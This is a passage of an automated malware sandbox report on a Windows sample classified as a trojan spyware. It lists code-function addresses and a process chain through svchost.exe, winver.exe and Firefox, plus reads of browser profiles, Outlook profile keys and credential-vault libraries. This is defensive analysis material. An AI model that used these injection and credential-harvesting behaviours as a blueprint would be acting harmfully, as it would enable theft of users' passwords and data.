                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0039242E0_2_0039242E
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003825FA0_2_003825FA
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003BE6160_2_003BE616
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003766E10_2_003766E1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0039878F0_2_0039878F
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003788080_2_00378808
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003E08570_2_003E0857
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003968440_2_00396844
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C88890_2_003C8889
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038CB210_2_0038CB21
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00396DB60_2_00396DB6
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00376F9E0_2_00376F9E
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003730300_2_00373030
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003831870_2_00383187
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038F1D90_2_0038F1D9
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003612870_2_00361287
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003814840_2_00381484
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003755200_2_00375520
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003876960_2_00387696
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003757600_2_00375760
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003819780_2_00381978
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00399AB50_2_00399AB5
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038BDA60_2_0038BDA6
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00381D900_2_00381D90
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003E7DDB0_2_003E7DDB
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0036DF000_2_0036DF00
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00373FE00_2_00373FE0
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00E79AE80_2_00E79AE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188E32_2_004188E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100EA2_2_004100EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100F32_2_004100F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031502_2_00403150
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AEE2_2_00416AEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AF32_2_00416AF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2F32_2_0040E2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103132_2_00410313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4432_2_0040E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C602_2_00401C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C7B2_2_00402C7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4382_2_0040E438
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C802_2_00402C80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E48C2_2_0040E48C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004047542_2_00404754
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EFD32_2_0042EFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A317EC2_2_03A317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 278 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 98 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 57 times
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: String function: 00388900 appears 42 times
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: String function: 00367DE1 appears 36 times
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: String function: 00380AE3 appears 70 times
                Source: aBEh0fsi2c.exe, 00000000.00000003.1334448045.0000000003783000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aBEh0fsi2c.exe
                Source: aBEh0fsi2c.exe, 00000000.00000003.1336401283.000000000397D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aBEh0fsi2c.exe
                Source: aBEh0fsi2c.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/5
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CA06A GetLastError,FormatMessageW,0_2_003CA06A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B81CB AdjustTokenPrivileges,CloseHandle,0_2_003B81CB
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003B87E1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003CB333
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003DEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003DEE0D
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003D83BB
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00364E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00364E89
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeFile created: C:\Users\user\AppData\Local\Temp\aut482C.tmpJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCommand line argument: 8]0_2_003647D0
                Source: aBEh0fsi2c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 00000005.00000002.2550854320.0000000003086000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2550854320.0000000003090000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1909375412.0000000003086000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2550854320.00000000030B4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1909195783.0000000003065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: aBEh0fsi2c.exeVirustotal: Detection: 31%
                Source: aBEh0fsi2c.exeReversingLabs: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\aBEh0fsi2c.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"Jump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: aBEh0fsi2c.exeStatic file information: File size 1183744 > 1048576
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: aBEh0fsi2c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWDsAjkFcK.exe, 00000004.00000002.2548851563.00000000008DE000.00000002.00000001.01000000.00000006.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1743900413.00000000008DE000.00000002.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdbUGP source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                Source: aBEh0fsi2c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: aBEh0fsi2c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: aBEh0fsi2c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: aBEh0fsi2c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: aBEh0fsi2c.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00364B37 LoadLibraryA,GetProcAddress,0_2_00364B37
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0036C4FE push A30036BAh; retn 0036h0_2_0036C50D
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00388945 push ecx; ret 0_2_00388958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411948 push ss; retf 2_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040214C pushad ; retf 2_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AAC push esp; retf 2_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B33 pushfd ; ret 2_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033E0 push eax; ret 2_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144FC push edi; retf 2_2_004144FE
